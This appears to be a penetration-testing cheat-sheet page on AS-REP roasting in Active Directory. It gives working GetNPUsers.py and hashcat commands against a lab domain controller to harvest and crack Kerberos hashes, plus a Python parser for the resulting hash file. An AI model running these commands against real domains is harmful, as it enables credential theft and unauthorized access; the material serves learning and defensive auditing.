ASREP-Roast


Last updated 6 months ago

Attack that finds accounts with the "Does not require Pre-Authentication" flag set (this lets the user request tickets without first authenticating to the KDC) and extracts their TGTs for cracking.

Without Kerberos pre-auth (the request from the client to the KDC for a TGT), "when a client sends an Authentication Service request, the client's User Principal Name (UPN) is included in the request with not much additional verification data. The KDC checks if the UPN exists in its database. If so, the KDC sends back an Authentication Service reply including a Ticket Granting ticket."

Using the GetNPUsers.py tool from impacket and passing an existing list of users, we can check which of those accounts are affected.

➧ cat users_valid.txt 
james@spookysec.local
[...]
python3 /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile users_valid.txt -dc-ip 10.10.253.172 -format hashcat -outputfile users_asreproastables.txt 'spookysec.local/'
hashcat -a 0 -m 18200 users_asreproastables.txt /usr/share/wordlists/rockyou.txt -o users_asreproastables.txt.cracked
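Added example (not from the original cheat sheet or from impacket): a small Python parser for the `$krb5asrep$23$` lines that the `-format hashcat -outputfile` run above writes, so the file can be turned into an inventory of accounts with pre-authentication disabled before (or instead of) cracking. It also checks the userAccountControl bit behind that setting. The sample lines and hex values are constructed, not captured data.

```python
"""Parse hashcat -m 18200 lines written by GetNPUsers.py -format hashcat."""
import re
from dataclasses import dataclass

DONT_REQ_PREAUTH = 0x400000  # userAccountControl bit: "Does not require Kerberos preauthentication"
RC4_HMAC = 23                # the only etype hashcat mode 18200 handles

# $krb5asrep$<etype>$<user>@<realm>:<16-byte checksum hex>$<encrypted enc-part hex>
LINE_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>(?:[0-9a-fA-F]{2})+)$"
)


@dataclass
class AsRepHash:
    etype: int
    user: str
    realm: str
    checksum: bytes  # HMAC-MD5 over the encrypted part (RC4-HMAC)
    edata: bytes     # AS-REP enc-part, encrypted with the account's key


def parse_line(line: str) -> AsRepHash:
    """Split one $krb5asrep$ line into fields; reject anything -m 18200 cannot crack."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a $krb5asrep$ line: {line[:32]!r}")
    etype = int(m["etype"])
    if etype != RC4_HMAC:
        raise ValueError(f"etype {etype} is not RC4-HMAC; hashcat -m 18200 will skip it")
    return AsRepHash(etype, m["user"], m["realm"],
                     bytes.fromhex(m["checksum"]), bytes.fromhex(m["edata"]))


def roastable_accounts(text: str) -> list[str]:
    """Return user@realm for every line of an -outputfile dump (blank lines skipped)."""
    return [f"{h.user}@{h.realm}"
            for h in map(parse_line, filter(str.strip, text.splitlines()))]


def dont_req_preauth(uac: int) -> bool:
    """True when an account's userAccountControl carries the flag that makes it roastable."""
    return bool(uac & DONT_REQ_PREAUTH)


# Constructed sample with the shape of users_asreproastables.txt (hex is made up).
SAMPLE = (
    "$krb5asrep$23$james@spookysec.local:0123456789abcdef0123456789abcdef$"
    + "deadbeef" * 8 + "\n"
    + "$krb5asrep$23$svc-backup@spookysec.local:fedcba9876543210fedcba9876543210$"
    + "cafebabe" * 8 + "\n"
)
```

Running `roastable_accounts(SAMPLE)` gives the list of accounts whose pre-authentication is disabled, which is the set an administrator should review and re-enable pre-auth on.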
https://www.linkedin.com/pulse/kerberos-pre-auth-one-checkbox-can-mean-lot-darryl
GetNPUsers.py - The Hacker Tools